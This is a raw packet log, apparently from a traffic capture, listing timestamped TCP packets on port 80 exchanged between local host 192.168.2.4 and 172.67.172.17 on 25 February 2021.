                                                                                                              Feb 25, 2021 15:09:59.947942019 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.947957039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.947978020 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948009968 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.948739052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948767900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948784113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948805094 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948827982 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948841095 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.948863983 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.948873997 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.949678898 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.949711084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.949731112 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.949753046 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.949774981 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.949788094 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.949817896 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.949826002 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.950639009 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.950669050 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.950690985 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.950704098 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.950727940 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.950738907 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.950759888 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.950783014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.950812101 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.951519966 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.951550961 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.951571941 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.951585054 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.951606035 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.951617956 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.951638937 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.951661110 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.951693058 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.952424049 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.952454090 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.952478886 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.952491999 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.952514887 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.952529907 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.952548981 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.952570915 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.952594042 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.953341961 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.953376055 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.953402042 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.953429937 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.953453064 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.953478098 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.953488111 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.953511953 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.953541994 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.954272985 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.954303980 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.954327106 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.954339981 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.954366922 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.954376936 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.954404116 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.954426050 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.954454899 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.955132008 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.955163002 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.955183983 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.955207109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.955224991 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.955233097 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.955251932 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.955275059 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.955307007 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.956031084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956064939 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956088066 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956100941 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.956129074 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956140995 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.956162930 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956183910 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956207037 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.956962109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.956995964 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957019091 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957031965 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.957062960 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957068920 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.957089901 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957110882 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957161903 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.957813025 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957844019 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957866907 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957889080 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957902908 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.957926035 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957936049 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.957957983 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.957969904 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.958636999 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.958661079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.958686113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.958703041 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.958722115 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.958736897 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.958755970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.958779097 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.958817959 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.959490061 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959522009 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959547043 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959566116 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.959589958 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959599018 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.959621906 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959645987 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959665060 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.959681034 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.959732056 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.960464954 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960493088 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960517883 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960537910 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960549116 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.960573912 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960587025 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.960606098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960628986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.960652113 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.961425066 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.961467981 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.961488008 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.961512089 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.961534977 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.961555004 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.961568117 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241969109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241986990 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242000103 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242022991 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242047071 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242070913 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242078066 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242103100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242125034 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242131948 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242152929 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242175102 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242185116 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242209911 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242228985 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242242098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242264986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242285967 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242307901 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242322922 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242341042 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242363930 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242386103 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242396116 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242419958 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242441893 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242454052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242480040 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242501974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242531061 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242546082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242568970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242593050 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242602110 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242625952 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242635012 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242656946 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242681026 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242698908 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242706060 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242768049 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274502993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274533033 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274554014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274579048 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274600983 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274616957 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274640083 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274662018 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274686098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274699926 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274725914 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274748087 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274761915 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274787903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274811029 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274827003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274852991 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274869919 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274888992 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274913073 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274933100 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274971962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274996042 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275027037 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275304079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275326967 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275346994 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275366068 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275384903 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275402069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275430918 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275454044 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275476933 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275509119 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275532961 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275549889 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275566101 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275587082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275607109 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275618076 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275641918 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275659084 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275679111 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275702953 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275727987 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275744915 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275770903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275785923 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275809050 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275832891 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275855064 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275892973 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275916100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275938034 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275949001 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275969982 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275990009 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276005030 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276047945 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276058912 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276082993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276124954 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276443005 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276468039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276492119 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276513100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276525974 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276554108 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276580095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276604891 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276629925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276648045 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276664972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276690960 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276711941 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276721954 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276746035 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276767969 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276779890 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276803970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276820898 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276839972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276864052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276879072 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276899099 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276925087 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276940107 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276956081 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277002096 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277251959 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277312994 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277340889 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277369022 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277376890 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277414083 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277437925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277463913 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277487993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277510881 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277520895 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277549028 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277555943 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277578115 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277616024 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277914047 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277934074 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277952909 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277968884 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277985096 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.278001070 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278022051 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.278037071 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278055906 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278084993 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.278105974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278126955 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315311909 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315341949 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315360069 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315382004 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315428019 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315656900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315694094 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315753937 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315763950 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315795898 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315826893 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315857887 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315885067 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315902948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315923929 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315943003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315972090 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316001892 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316015005 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316042900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316067934 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316098928 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316129923 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316148996 CET4972280192.168.2.4172.67.172.17
